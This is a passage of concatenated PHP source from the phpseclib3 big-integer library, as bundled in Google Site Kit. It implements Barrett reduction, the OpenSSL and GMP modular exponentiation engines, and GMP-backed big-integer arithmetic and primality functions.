$x * @param array $n * @param string $class * @return array */ protected static function reduce(array $x, array $n, $class) { $lhs = new $class(); $lhs->value = $x; $rhs = new $class(); $rhs->value = $n; list(, $temp) = $lhs->divide($rhs); return $temp->value; } } <?php /** * PHP Barrett Modular Exponentiation Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\Reductions; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\Base; /** * PHP Barrett Modular Exponentiation Engine * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Barrett extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP\Base { /** * Barrett Modular Reduction * * See {@link http://www.cacr.math.uwaterloo.ca/hac/about/chap14.pdf#page=14 HAC 14.3.3} / * {@link http://math.libtomcrypt.com/files/tommath.pdf#page=165 MPM 6.2.5} for more information. Modified slightly, * so as not to require negative numbers (initially, this script didn't support negative numbers). * * Employs "folding", as described at * {@link http://www.cosic.esat.kuleuven.be/publications/thesis-149.pdf#page=66 thesis-149.pdf#page=66}. To quote from * it, "the idea [behind folding] is to find a value x' such that x (mod m) = x' (mod m), with x' being smaller than x." * * Unfortunately, the "Barrett Reduction with Folding" algorithm described in thesis-149.pdf is not, as written, all that * usable on account of (1) its not using reasonable radix points as discussed in * {@link http://math.libtomcrypt.com/files/tommath.pdf#page=162 MPM 6.2.2} and (2) the fact that, even with reasonable * radix points, it only works when there are an even number of digits in the denominator. The reason for (2) is that * (x >> 1) + (x >> 1) != x / 2 + x / 2. If x is even, they're the same, but if x is odd, they're not. See the in-line * comments for details. * * @param array $n * @param array $m * @param class-string<PHP> $class * @return array */ protected static function reduce(array $n, array $m, $class) { static $cache = [self::VARIABLE => [], self::DATA => []]; $m_length = \count($m); // if (self::compareHelper($n, $static::square($m)) >= 0) { if (\count($n) > 2 * $m_length) { $lhs = new $class(); $rhs = new $class(); $lhs->value = $n; $rhs->value = $m; list(, $temp) = $lhs->divide($rhs); return $temp->value; } // if (m.length >> 1) + 2 <= m.length then m is too small and n can't be reduced if ($m_length < 5) { return self::regularBarrett($n, $m, $class); } // n = 2 * m.length $correctionNeeded = \false; if ($m_length & 1) { $correctionNeeded = \true; \array_unshift($n, 0); \array_unshift($m, 0); $m_length++; } if (($key = \array_search($m, $cache[self::VARIABLE])) === \false) { $key = \count($cache[self::VARIABLE]); $cache[self::VARIABLE][] = $m; $lhs = new $class(); $lhs_value =& $lhs->value; $lhs_value = self::array_repeat(0, $m_length + ($m_length >> 1)); $lhs_value[] = 1; $rhs = new $class(); $rhs->value = $m; list($u, $m1) = $lhs->divide($rhs); $u = $u->value; $m1 = $m1->value; $cache[self::DATA][] = [ 'u' => $u, // m.length >> 1 (technically (m.length >> 1) + 1) 'm1' => $m1, ]; } else { \extract($cache[self::DATA][$key]); } $cutoff = $m_length + ($m_length >> 1); $lsd = \array_slice($n, 0, $cutoff); // m.length + (m.length >> 1) $msd = \array_slice($n, $cutoff); // m.length >> 1 $lsd = self::trim($lsd); $temp = $class::multiplyHelper($msd, \false, $m1, \false); // m.length + (m.length >> 1) $n = $class::addHelper($lsd, \false, $temp[self::VALUE], \false); // m.length + (m.length >> 1) + 1 (so basically we're adding two same length numbers) //if ($m_length & 1) { // return self::regularBarrett($n[self::VALUE], $m, $class); //} // (m.length + (m.length >> 1) + 1) - (m.length - 1) == (m.length >> 1) + 2 $temp = \array_slice($n[self::VALUE], $m_length - 1); // if even: ((m.length >> 1) + 2) + (m.length >> 1) == m.length + 2 // if odd: ((m.length >> 1) + 2) + (m.length >> 1) == (m.length - 1) + 2 == m.length + 1 // note that these are upper bounds. let's say m.length is 2. then you'd be multiplying a // 3 digit number by a 1 digit number. if you're doing 999 * 9 (in base 10) the result will // be a 4 digit number. but if you're multiplying 111 * 1 then the result will be a 3 digit // number. $temp = $class::multiplyHelper($temp, \false, $u, \false); // if even: (m.length + 2) - ((m.length >> 1) + 1) = m.length - (m.length >> 1) + 1 // if odd: (m.length + 1) - ((m.length >> 1) + 1) = m.length - (m.length >> 1) $temp = \array_slice($temp[self::VALUE], ($m_length >> 1) + 1); // if even: (m.length - (m.length >> 1) + 1) + m.length = 2 * m.length - (m.length >> 1) + 1 // if odd: (m.length - (m.length >> 1)) + m.length = 2 * m.length - (m.length >> 1) $temp = $class::multiplyHelper($temp, \false, $m, \false); // at this point, if m had an odd number of digits, we'd (probably) be subtracting a 2 * m.length - (m.length >> 1) // digit number from a m.length + (m.length >> 1) + 1 digit number. ie. there'd be an extra digit and the while loop // following this comment would loop a lot (hence our calling _regularBarrett() in that situation). $result = $class::subtractHelper($n[self::VALUE], \false, $temp[self::VALUE], \false); while (self::compareHelper($result[self::VALUE], $result[self::SIGN], $m, \false) >= 0) { $result = $class::subtractHelper($result[self::VALUE], $result[self::SIGN], $m, \false); } if ($correctionNeeded) { \array_shift($result[self::VALUE]); } return $result[self::VALUE]; } /** * (Regular) Barrett Modular Reduction * * For numbers with more than four digits BigInteger::_barrett() is faster. The difference between that and this * is that this function does not fold the denominator into a smaller form. * * @param array $x * @param array $n * @param string $class * @return array */ private static function regularBarrett(array $x, array $n, $class) { static $cache = [self::VARIABLE => [], self::DATA => []]; $n_length = \count($n); if (\count($x) > 2 * $n_length) { $lhs = new $class(); $rhs = new $class(); $lhs->value = $x; $rhs->value = $n; list(, $temp) = $lhs->divide($rhs); return $temp->value; } if (($key = \array_search($n, $cache[self::VARIABLE])) === \false) { $key = \count($cache[self::VARIABLE]); $cache[self::VARIABLE][] = $n; $lhs = new $class(); $lhs_value =& $lhs->value; $lhs_value = self::array_repeat(0, 2 * $n_length); $lhs_value[] = 1; $rhs = new $class(); $rhs->value = $n; list($temp, ) = $lhs->divide($rhs); // m.length $cache[self::DATA][] = $temp->value; } // 2 * m.length - (m.length - 1) = m.length + 1 $temp = \array_slice($x, $n_length - 1); // (m.length + 1) + m.length = 2 * m.length + 1 $temp = $class::multiplyHelper($temp, \false, $cache[self::DATA][$key], \false); // (2 * m.length + 1) - (m.length - 1) = m.length + 2 $temp = \array_slice($temp[self::VALUE], $n_length + 1); // m.length + 1 $result = \array_slice($x, 0, $n_length + 1); // m.length + 1 $temp = self::multiplyLower($temp, \false, $n, \false, $n_length + 1, $class); // $temp == array_slice($class::regularMultiply($temp, false, $n, false)->value, 0, $n_length + 1) if (self::compareHelper($result, \false, $temp[self::VALUE], $temp[self::SIGN]) < 0) { $corrector_value = self::array_repeat(0, $n_length + 1); $corrector_value[\count($corrector_value)] = 1; $result = $class::addHelper($result, \false, $corrector_value, \false); $result = $result[self::VALUE]; } // at this point, we're subtracting a number with m.length + 1 digits from another number with m.length + 1 digits $result = $class::subtractHelper($result, \false, $temp[self::VALUE], $temp[self::SIGN]); while (self::compareHelper($result[self::VALUE], $result[self::SIGN], $n, \false) > 0) { $result = $class::subtractHelper($result[self::VALUE], $result[self::SIGN], $n, \false); } return $result[self::VALUE]; } /** * Performs long multiplication up to $stop digits * * If you're going to be doing array_slice($product->value, 0, $stop), some cycles can be saved. * * @see self::regularBarrett() * @param array $x_value * @param bool $x_negative * @param array $y_value * @param bool $y_negative * @param int $stop * @param string $class * @return array */ private static function multiplyLower(array $x_value, $x_negative, array $y_value, $y_negative, $stop, $class) { $x_length = \count($x_value); $y_length = \count($y_value); if (!$x_length || !$y_length) { // a 0 is being multiplied return [self::VALUE => [], self::SIGN => \false]; } if ($x_length < $y_length) { $temp = $x_value; $x_value = $y_value; $y_value = $temp; $x_length = \count($x_value); $y_length = \count($y_value); } $product_value = self::array_repeat(0, $x_length + $y_length); // the following for loop could be removed if the for loop following it // (the one with nested for loops) initially set $i to 0, but // doing so would also make the result in one set of unnecessary adds, // since on the outermost loops first pass, $product->value[$k] is going // to always be 0 $carry = 0; for ($j = 0; $j < $x_length; ++$j) { // ie. $i = 0, $k = $i $temp = $x_value[$j] * $y_value[0] + $carry; // $product_value[$k] == 0 $carry = $class::BASE === 26 ? \intval($temp / 0x4000000) : $temp >> 31; $product_value[$j] = (int) ($temp - $class::BASE_FULL * $carry); } if ($j < $stop) { $product_value[$j] = $carry; } // the above for loop is what the previous comment was talking about. the // following for loop is the "one with nested for loops" for ($i = 1; $i < $y_length; ++$i) { $carry = 0; for ($j = 0, $k = $i; $j < $x_length && $k < $stop; ++$j, ++$k) { $temp = $product_value[$k] + $x_value[$j] * $y_value[$i] + $carry; $carry = $class::BASE === 26 ? \intval($temp / 0x4000000) : $temp >> 31; $product_value[$k] = (int) ($temp - $class::BASE_FULL * $carry); } if ($k < $stop) { $product_value[$k] = $carry; } } return [self::VALUE => self::trim($product_value), self::SIGN => $x_negative != $y_negative]; } } <?php /** * OpenSSL Modular Exponentiation Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\PHP; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\OpenSSL as Progenitor; /** * OpenSSL Modular Exponentiation Engine * * @author Jim Wigginton <terrafrost@php.net> */ abstract class OpenSSL extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\OpenSSL { } <?php /** * GMP Modular Exponentiation Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP; /** * GMP Modular Exponentiation Engine * * @author Jim Wigginton <terrafrost@php.net> */ abstract class DefaultEngine extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP { /** * Performs modular exponentiation. * * @param GMP $x * @param GMP $e * @param GMP $n * @return GMP */ protected static function powModHelper(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $x, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $n) { $temp = new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP(); $temp->value = \gmp_powm($x->value, $e->value, $n->value); return $x->normalize($temp); } } <?php /** * OpenSSL Modular Exponentiation Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys\PKCS8; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * OpenSSL Modular Exponentiation Engine * * @author Jim Wigginton <terrafrost@php.net> */ abstract class OpenSSL { /** * Test for engine validity * * @return bool */ public static function isValidEngine() { return \extension_loaded('openssl') && static::class != __CLASS__; } /** * Performs modular exponentiation. * * @param Engine $x * @param Engine $e * @param Engine $n * @return Engine */ public static function powModHelper(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $x, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $n) { if ($n->getLengthInBytes() < 31 || $n->getLengthInBytes() > 16384) { throw new \OutOfRangeException('Only modulo between 31 and 16384 bits are accepted'); } $key = \Google\Site_Kit_Dependencies\phpseclib3\Crypt\RSA\Formats\Keys\PKCS8::savePublicKey(new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($n), new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger($e)); $plaintext = \str_pad($x->toBytes(), $n->getLengthInBytes(), "\x00", \STR_PAD_LEFT); // this is easily prone to failure. if the modulo is a multiple of 2 or 3 or whatever it // won't work and you'll get a "failure: error:0906D06C:PEM routines:PEM_read_bio:no start line" // error. i suppose, for even numbers, we could do what PHP\Montgomery.php does, but then what // about odd numbers divisible by 3, by 5, etc? if (!\openssl_public_encrypt($plaintext, $result, $key, \OPENSSL_NO_PADDING)) { throw new \UnexpectedValueException(\openssl_error_string()); } $class = \get_class($x); return new $class($result, 256); } } <?php /** * GMP BigInteger Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines; use Google\Site_Kit_Dependencies\phpseclib3\Exception\BadConfigurationException; /** * GMP Engine. * * @author Jim Wigginton <terrafrost@php.net> */ class GMP extends \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine { /** * Can Bitwise operations be done fast? * * @see parent::bitwise_leftRotate() * @see parent::bitwise_rightRotate() */ const FAST_BITWISE = \true; /** * Engine Directory * * @see parent::setModExpEngine */ const ENGINE_DIR = 'GMP'; /** * Test for engine validity * * @return bool * @see parent::__construct() */ public static function isValidEngine() { return \extension_loaded('gmp'); } /** * Default constructor * * @param mixed $x integer Base-10 number or base-$base number if $base set. * @param int $base * @see parent::__construct() */ public function __construct($x = 0, $base = 10) { if (!isset(static::$isValidEngine[static::class])) { static::$isValidEngine[static::class] = self::isValidEngine(); } if (!static::$isValidEngine[static::class]) { throw new \Google\Site_Kit_Dependencies\phpseclib3\Exception\BadConfigurationException('GMP is not setup correctly on this system'); } if ($x instanceof \GMP) { $this->value = $x; return; } $this->value = \gmp_init(0); parent::__construct($x, $base); } /** * Initialize a GMP BigInteger Engine instance * * @param int $base * @see parent::__construct() */ protected function initialize($base) { switch (\abs($base)) { case 256: $this->value = \gmp_import($this->value); if ($this->is_negative) { $this->value = -$this->value; } break; case 16: $temp = $this->is_negative ? '-0x' . $this->value : '0x' . $this->value; $this->value = \gmp_init($temp); break; case 10: $this->value = \gmp_init(isset($this->value) ? $this->value : '0'); } } /** * Converts a BigInteger to a base-10 number. * * @return string */ public function toString() { return (string) $this->value; } /** * Converts a BigInteger to a bit string (eg. base-2). * * Negative numbers are saved as positive numbers, unless $twos_compliment is set to true, at which point, they're * saved as two's compliment. * * @param bool $twos_compliment * @return string */ public function toBits($twos_compliment = \false) { $hex = $this->toHex($twos_compliment); $bits = \gmp_strval(\gmp_init($hex, 16), 2); if ($this->precision > 0) { $bits = \substr($bits, -$this->precision); } if ($twos_compliment && $this->compare(new static()) > 0 && $this->precision <= 0) { return '0' . $bits; } return $bits; } /** * Converts a BigInteger to a byte string (eg. base-256). * * @param bool $twos_compliment * @return string */ public function toBytes($twos_compliment = \false) { if ($twos_compliment) { return $this->toBytesHelper(); } if (\gmp_cmp($this->value, \gmp_init(0)) == 0) { return $this->precision > 0 ? \str_repeat(\chr(0), $this->precision + 1 >> 3) : ''; } $temp = \gmp_export($this->value); return $this->precision > 0 ? \substr(\str_pad($temp, $this->precision >> 3, \chr(0), \STR_PAD_LEFT), -($this->precision >> 3)) : \ltrim($temp, \chr(0)); } /** * Adds two BigIntegers. * * @param GMP $y * @return GMP */ public function add(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $y) { $temp = new self(); $temp->value = $this->value + $y->value; return $this->normalize($temp); } /** * Subtracts two BigIntegers. * * @param GMP $y * @return GMP */ public function subtract(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $y) { $temp = new self(); $temp->value = $this->value - $y->value; return $this->normalize($temp); } /** * Multiplies two BigIntegers. * * @param GMP $x * @return GMP */ public function multiply(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $x) { $temp = new self(); $temp->value = $this->value * $x->value; return $this->normalize($temp); } /** * Divides two BigIntegers. * * Returns an array whose first element contains the quotient and whose second element contains the * "common residue". If the remainder would be positive, the "common residue" and the remainder are the * same. If the remainder would be negative, the "common residue" is equal to the sum of the remainder * and the divisor (basically, the "common residue" is the first positive modulo). * * @param GMP $y * @return array{GMP, GMP} */ public function divide(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $y) { $quotient = new self(); $remainder = new self(); list($quotient->value, $remainder->value) = \gmp_div_qr($this->value, $y->value); if (\gmp_sign($remainder->value) < 0) { $remainder->value = $remainder->value + \gmp_abs($y->value); } return [$this->normalize($quotient), $this->normalize($remainder)]; } /** * Compares two numbers. * * Although one might think !$x->compare($y) means $x != $y, it, in fact, means the opposite. The reason for this * is demonstrated thusly: * * $x > $y: $x->compare($y) > 0 * $x < $y: $x->compare($y) < 0 * $x == $y: $x->compare($y) == 0 * * Note how the same comparison operator is used. If you want to test for equality, use $x->equals($y). * * {@internal Could return $this->subtract($x), but that's not as fast as what we do do.} * * @param GMP $y * @return int in case < 0 if $this is less than $y; > 0 if $this is greater than $y, and 0 if they are equal. * @see self::equals() */ public function compare(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $y) { $r = \gmp_cmp($this->value, $y->value); if ($r < -1) { $r = -1; } if ($r > 1) { $r = 1; } return $r; } /** * Tests the equality of two numbers. * * If you need to see if one number is greater than or less than another number, use BigInteger::compare() * * @param GMP $x * @return bool */ public function equals(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $x) { return $this->value == $x->value; } /** * Calculates modular inverses. * * Say you have (30 mod 17 * x mod 17) mod 17 == 1. x can be found using modular inverses. * * @param GMP $n * @return false|GMP */ public function modInverse(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $n) { $temp = new self(); $temp->value = \gmp_invert($this->value, $n->value); return $temp->value === \false ? \false : $this->normalize($temp); } /** * Calculates the greatest common divisor and Bezout's identity. * * Say you have 693 and 609. The GCD is 21. Bezout's identity states that there exist integers x and y such that * 693*x + 609*y == 21. In point of fact, there are actually an infinite number of x and y combinations and which * combination is returned is dependent upon which mode is in use. See * {@link http://en.wikipedia.org/wiki/B%C3%A9zout%27s_identity Bezout's identity - Wikipedia} for more information. * * @param GMP $n * @return GMP[] */ public function extendedGCD(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $n) { \extract(\gmp_gcdext($this->value, $n->value)); return ['gcd' => $this->normalize(new self($g)), 'x' => $this->normalize(new self($s)), 'y' => $this->normalize(new self($t))]; } /** * Calculates the greatest common divisor * * Say you have 693 and 609. The GCD is 21. * * @param GMP $n * @return GMP */ public function gcd(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $n) { $r = \gmp_gcd($this->value, $n->value); return $this->normalize(new self($r)); } /** * Absolute value. * * @return GMP */ public function abs() { $temp = new self(); $temp->value = \gmp_abs($this->value); return $temp; } /** * Logical And * * @param GMP $x * @return GMP */ public function bitwise_and(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $x) { $temp = new self(); $temp->value = $this->value & $x->value; return $this->normalize($temp); } /** * Logical Or * * @param GMP $x * @return GMP */ public function bitwise_or(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $x) { $temp = new self(); $temp->value = $this->value | $x->value; return $this->normalize($temp); } /** * Logical Exclusive Or * * @param GMP $x * @return GMP */ public function bitwise_xor(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $x) { $temp = new self(); $temp->value = $this->value ^ $x->value; return $this->normalize($temp); } /** * Logical Right Shift * * Shifts BigInteger's by $shift bits, effectively dividing by 2**$shift. * * @param int $shift * @return GMP */ public function bitwise_rightShift($shift) { // 0xFFFFFFFF >> 2 == -1 (on 32-bit systems) // gmp_init('0xFFFFFFFF') >> 2 == gmp_init('0x3FFFFFFF') $temp = new self(); $temp->value = $this->value >> $shift; return $this->normalize($temp); } /** * Logical Left Shift * * Shifts BigInteger's by $shift bits, effectively multiplying by 2**$shift. * * @param int $shift * @return GMP */ public function bitwise_leftShift($shift) { $temp = new self(); $temp->value = $this->value << $shift; return $this->normalize($temp); } /** * Performs modular exponentiation. * * @param GMP $e * @param GMP $n * @return GMP */ public function modPow(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $n) { return $this->powModOuter($e, $n); } /** * Performs modular exponentiation. * * Alias for modPow(). * * @param GMP $e * @param GMP $n * @return GMP */ public function powMod(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $n) { return $this->powModOuter($e, $n); } /** * Performs modular exponentiation. * * @param GMP $e * @param GMP $n * @return GMP */ protected function powModInner(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $e, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $n) { $class = static::$modexpEngine[static::class]; return $class::powModHelper($this, $e, $n); } /** * Normalize * * Removes leading zeros and truncates (if necessary) to maintain the appropriate precision * * @param GMP $result * @return GMP */ protected function normalize(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $result) { $result->precision = $this->precision; $result->bitmask = $this->bitmask; if ($result->bitmask !== \false) { $flip = $result->value < 0; if ($flip) { $result->value = -$result->value; } $result->value = $result->value & $result->bitmask->value; if ($flip) { $result->value = -$result->value; } } return $result; } /** * Performs some post-processing for randomRangePrime * * @param Engine $x * @param Engine $min * @param Engine $max * @return GMP */ protected static function randomRangePrimeInner(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $x, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $min, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\Engine $max) { $p = \gmp_nextprime($x->value); if ($p <= $max->value) { return new self($p); } if ($min->value != $x->value) { $x = new self($x->value - 1); } return self::randomRangePrime($min, $x); } /** * Generate a random prime number between a range * * If there's not a prime within the given range, false will be returned. * * @param GMP $min * @param GMP $max * @return false|GMP */ public static function randomRangePrime(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $min, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $max) { return self::randomRangePrimeOuter($min, $max); } /** * Generate a random number between a range * * Returns a random number between $min and $max where $min and $max * can be defined using one of the two methods: * * BigInteger::randomRange($min, $max) * BigInteger::randomRange($max, $min) * * @param GMP $min * @param GMP $max * @return GMP */ public static function randomRange(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $min, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $max) { return self::randomRangeHelper($min, $max); } /** * Make the current number odd * * If the current number is odd it'll be unchanged. If it's even, one will be added to it. * * @see self::randomPrime() */ protected function make_odd() { \gmp_setbit($this->value, 0); } /** * Tests Primality * * @param int $t * @return bool */ protected function testPrimality($t) { return \gmp_prob_prime($this->value, $t) != 0; } /** * Calculates the nth root of a biginteger. * * Returns the nth root of a positive biginteger, where n defaults to 2 * * @param int $n * @return GMP */ protected function rootInner($n) { $root = new self(); $root->value = \gmp_root($this->value, $n); return $this->normalize($root); } /** * Performs exponentiation. * * @param GMP $n * @return GMP */ public function pow(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $n) { $temp = new self(); $temp->value = $this->value ** $n->value; return $this->normalize($temp); } /** * Return the minimum BigInteger between an arbitrary number of BigIntegers. * * @param GMP ...$nums * @return GMP */ public static function min(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP ...$nums) { return self::minHelper($nums); } /** * Return the maximum BigInteger between an arbitrary number of BigIntegers. * * @param GMP ...$nums * @return GMP */ public static function max(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP ...$nums) { return self::maxHelper($nums); } /** * Tests BigInteger to see if it is between two integers, inclusive * * @param GMP $min * @param GMP $max * @return bool */ public function between(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $min, \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $max) { return $this->compare($min) >= 0 && $this->compare($max) <= 0; } /** * Create Recurring Modulo Function * * Sometimes it may be desirable to do repeated modulos with the same number outside of * modular exponentiation * * @return callable */ public function createRecurringModuloFunction() { $temp = $this->value; return function (\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $x) use($temp) { return new \Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP($x->value % $temp); }; } /** * Scan for 1 and right shift by that amount * * ie. $s = gmp_scan1($n, 0) and $r = gmp_div_q($n, gmp_pow(gmp_init('2'), $s)); * * @param GMP $r * @return int */ public static function scan1divide(\Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines\GMP $r) { $s = \gmp_scan1($r->value, 0); $r->value >>= $s; return $s; } /** * Is Odd? * * @return bool */ public function isOdd() { return \gmp_testbit($this->value, 0); } /** * Tests if a bit is set * * @return bool */ public function testBit($x) { return \gmp_testbit($this->value, $x); } /** * Is Negative? * * @return bool */ public function isNegative() { return \gmp_sign($this->value) == -1; } /** * Negate * * Given $k, returns -$k * * @return GMP */ public function negate() { $temp = clone $this; $temp->value = -$this->value; return $temp; } } <?php /** * Base BigInteger Engine * * PHP version 5 and 7 * * @author Jim Wigginton <terrafrost@php.net> * @copyright 2017 Jim Wigginton * @license http://www.opensource.org/licenses/mit-license.html MIT License * @link http://pear.php.net/package/Math_BigInteger */ namespace Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger\Engines; use Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings; use Google\Site_Kit_Dependencies\phpseclib3\Crypt\Random; use Google\Site_Kit_Dependencies\phpseclib3\Exception\BadConfigurationException; use Google\Site_Kit_Dependencies\phpseclib3\Math\BigInteger; /** * Base Engine. * * @author Jim Wigginton <terrafrost@php.net> */ abstract class Engine implements \JsonSerializable { /* final protected */ const PRIMES = [3, 5, 7, 11, 13, 17, 19, 23, 29, 31, 37, 41, 43, 47, 53, 59, 61, 67, 71, 73, 79, 83, 89, 97, 101, 103, 107, 109, 113, 127, 131, 137, 139, 149, 151, 157, 163, 167, 173, 179, 181, 191, 193, 197, 199, 211, 223, 227, 229, 233, 239, 241, 251, 257, 263, 269, 271, 277, 281, 283, 293, 307, 311, 313, 317, 331, 337, 347, 349, 353, 359, 367, 373, 379, 383, 389, 397, 401, 409, 419, 421, 431, 433, 439, 443, 449, 457, 461, 463, 467, 479, 487, 491, 499, 503, 509, 521, 523, 541, 547, 557, 563, 569, 571, 577, 587, 593, 599, 601, 607, 613, 617, 619, 631, 641, 643, 647, 653, 659, 661, 673, 677, 683, 691, 701, 709, 719, 727, 733, 739, 743, 751, 757, 761, 769, 773, 787, 797, 809, 811, 821, 823, 827, 829, 839, 853, 857, 859, 863, 877, 881, 883, 887, 907, 911, 919, 929, 937, 941, 947, 953, 967, 971, 977, 983, 991, 997]; /** * BigInteger(0) * * @var array<class-string<static>, static> */ protected static $zero = []; /** * BigInteger(1) * * @var array<class-string<static>, static> */ protected static $one = []; /** * BigInteger(2) * * @var array<class-string<static>, static> */ protected static $two = []; /** * Modular Exponentiation Engine * * @var array<class-string<static>, class-string<static>> */ protected static $modexpEngine; /** * Engine Validity Flag * * @var array<class-string<static>, bool> */ protected static $isValidEngine; /** * Holds the BigInteger's value * * @var \GMP|string|array|int */ protected $value; /** * Holds the BigInteger's sign * * @var bool */ protected $is_negative; /** * Precision * * @see static::setPrecision() * @var int */ protected $precision = -1; /** * Precision Bitmask * * @see static::setPrecision() * @var static|false */ protected $bitmask = \false; /** * Recurring Modulo Function * * @var callable */ protected $reduce; /** * Mode independent value used for serialization. * * @see self::__sleep() * @see self::__wakeup() * @var string */ protected $hex; /** * Default constructor * * @param int|numeric-string $x integer Base-10 number or base-$base number if $base set. * @param int $base */ public function __construct($x = 0, $base = 10) { if (!\array_key_exists(static::class, static::$zero)) { static::$zero[static::class] = null; // Placeholder to prevent infinite loop. static::$zero[static::class] = new static(0); static::$one[static::class] = new static(1); static::$two[static::class] = new static(2); } // '0' counts as empty() but when the base is 256 '0' is equal to ord('0') or 48 // '0' is the only value like this per http://php.net/empty if (empty($x) && (\abs($base) != 256 || $x !== '0')) { return; } switch ($base) { case -256: case 256: if ($base == -256 && \ord($x[0]) & 0x80) { $this->value = ~$x; $this->is_negative = \true; } else { $this->value = $x; $this->is_negative = \false; } $this->initialize($base); if ($this->is_negative) { $temp = $this->add(new static('-1')); $this->value = $temp->value; } break; case -16: case 16: if ($base > 0 && $x[0] == '-') { $this->is_negative = \true; $x = \substr($x, 1); } $x = \preg_replace('#^(?:0x)?([A-Fa-f0-9]*).*#s', '$1', $x); $is_negative = \false; if ($base < 0 && \hexdec($x[0]) >= 8) { $this->is_negative = $is_negative = \true; $x = \Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::bin2hex(~\Google\Site_Kit_Dependencies\phpseclib3\Common\Functions\Strings::hex2bin($x)); } $this->value = $x; $this->initialize($base); if ($is_negative) { 